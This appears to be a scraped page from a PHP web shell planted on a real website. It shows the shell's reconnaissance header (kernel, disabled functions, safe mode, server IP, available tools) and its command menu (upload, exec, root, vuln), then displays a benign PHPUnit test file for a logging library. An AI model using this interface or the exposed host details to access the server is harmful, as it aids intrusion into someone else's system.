Kernel : Linux vmw02p.internet-indee.net 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Tue Nov 16 14:42:35 UTC 2021 x86_64
Disable function : NONE
Safe mode : OFF
Host : firofichi.it | Server ip : 5.196.164.15 | Your ip : 18.116.90.59 | Time @ Server : 19 Oct 2024 07:08:34
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/webmaster/firofichi/www/vendor/consolidation/log/tests/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/webmaster/firofichi/www/vendor/consolidation/log/tests/LogMethodTests.php

<?php namespace Consolidation\Log; use Symfony\Component\Console\Output\BufferedOutput; use Symfony\Component\Console\Output\OutputInterface; use PHPUnit\Framework\TestCase; class LogMethodTests extends TestCase { protected $output; protected $logger; function setup() { $this->output = new BufferedOutput(); $this->output->setVerbosity(OutputInterface::VERBOSITY_DEBUG); $this->logger = new Logger($this->output); $this->logger->setLogOutputStyler(new UnstyledLogOutputStyler()); } function testError() { $this->logger->error('Do not enter - wrong way.'); $outputText = rtrim($this->output->fetch()); $this->assertEquals(' [error] Do not enter - wrong way.', $outputText); } function testWarning() { $this->logger->warning('Steep grade.'); $outputText = rtrim($this->output->fetch()); $this->assertEquals(' [warning] Steep grade.', $outputText); } function testNotice() { $this->logger->notice('No loitering.'); $outputText = rtrim($this->output->fetch()); $this->assertEquals(' [notice] No loitering.', $outputText); } function testInfo() { $this->logger->info('Scenic route.'); $outputText = rtrim($this->output->fetch()); $this->assertEquals(' [info] Scenic route.', $outputText); } function testDebug() { $this->logger->debug('Counter incremented.'); $outputText = rtrim($this->output->fetch()); $this->assertEquals(' [debug] Counter incremented.', $outputText); } function testSuccess() { $this->logger->success('It worked!'); $outputText = rtrim($this->output->fetch()); $this->assertEquals(' [success] It worked!', $outputText); } }